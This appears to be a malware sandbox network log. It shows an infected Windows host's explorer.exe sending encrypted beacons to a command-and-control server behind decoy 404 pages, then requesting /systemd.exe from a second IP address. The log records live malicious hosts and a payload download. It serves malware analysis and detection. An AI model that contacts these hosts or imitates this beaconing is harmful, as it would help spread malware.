                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449738187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:28.484920979 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://bhwagrsoolcnla.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 180
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:28.484946966 CEST180OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 26 49 ba 90
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu&IxMtj^k1$%{[ITcJK?WUqSD8AG:UqnpCk9s
                                                                              Jul 27, 2024 14:52:29.552938938 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:29 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449739187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:29.561279058 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://kjroavoygfbpsdwi.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 346
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:29.561302900 CEST346OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5f 41 d3 97
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu_A WeYcwWP#1i,bc&k=+%&ZCzw445EVDb>3ii=J %. Tq2#e4k@
                                                                              Jul 27, 2024 14:52:30.609934092 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:30 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.449740187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:30.619162083 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://mvqckdwrharucrcg.net/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 250
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:30.619163036 CEST250OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 75 46 ab 99
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vuuFd5xS]ToOYFu8w"k`u&doEO5q3@XAF[@he^{QW4XZyDVnZn("7
                                                                              Jul 27, 2024 14:52:31.656898022 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:31 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.449741187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:31.664983988 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://mouvjsinrynjyai.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 325
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:31.665005922 CEST325OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 51 38 f1 8e
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vuQ8k<XSBx1TvGCojyYWK3-qZ8/{8NGWp*J4==1=2v{O0\V} gU,
                                                                              Jul 27, 2024 14:52:32.713849068 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:32 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.449742187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:32.722889900 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://tbyklxggimhnmx.org/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 249
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:32.722889900 CEST249OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 37 1b a6 ba
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu7.ZyM#pw|hp&>@y@/5~;'$|O-2m,H*|r@l^Gu|sso>Ajh1Z
                                                                              Jul 27, 2024 14:52:33.750946999 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:33 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.449743187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:33.759694099 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://xnfvpysrwik.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 258
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:33.759694099 CEST258OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 28 24 d0 fd
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu($uZR|n=_cqn]]n`zY@[\SW@KOF,~KO:U*Ph\88?l(UYqU1|9L!
                                                                              Jul 27, 2024 14:52:34.812077999 CEST189INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:34 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 2e 5c 24 14 a6 69 44 aa ad 10 bd cf b4 f9 6d 87 37 c6 ec 26 57 11 c2 8f 97 cb
                                                                              Data Ascii: #\.\$iDm7&W


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.44974477.221.157.163802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:34.820139885 CEST163OUTGET /systemd.exe HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Host: 77.221.157.163


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              9192.168.2.449746187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:56.320470095 CEST276OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://ipccodalkut.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 183
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:56.320470095 CEST183OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 5f 32 e3 8e
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu_2;|rlWo)3c`o|d"QchTTvm5&R gD3]LFN
                                                                              Jul 27, 2024 14:52:57.378540993 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:57 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              10192.168.2.449747187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:57.387674093 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://kuebqjlbbtfbj.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 355
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:57.387706041 CEST355OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 20 2a f9 82
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vu *+m2MTyo9lGT!#:wg#%0}FZkA._k1p\x9"K8}FDkt!qb\T]
                                                                              Jul 27, 2024 14:52:58.418559074 CEST137INHTTP/1.1 200 OK
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:58 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.449748187.199.183.102802580C:\Windows\explorer.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jul 27, 2024 14:52:58.428731918 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Accept: */*
                                                                              Referer: http://jtflrtuktjsvucm.com/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                              Content-Length: 173
                                                                              Host: mzxn.ru
                                                                              Jul 27, 2024 14:52:58.428731918 CEST173OUTData Raw: 3b 6e 53 14 82 cd 1c 53 dc ac c4 07 70 77 08 cc 09 08 c1 90 1f 71 92 16 7b 7c 7b 90 49 c1 c4 63 e9 5e b4 5a 0f 69 22 6d 98 9f 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 55 4c bb 9e
                                                                              Data Ascii: ;nSSpwq{|{Ic^Zi"m? 9Yt M@NA -[k,vuULRl3W]$Z8X@:!IfA+?nT5? l\8?qQ7LB/
                                                                              Jul 27, 2024 14:52:59.470957041 CEST484INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.26.0
                                                                              Date: Sat, 27 Jul 2024 12:52:59 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 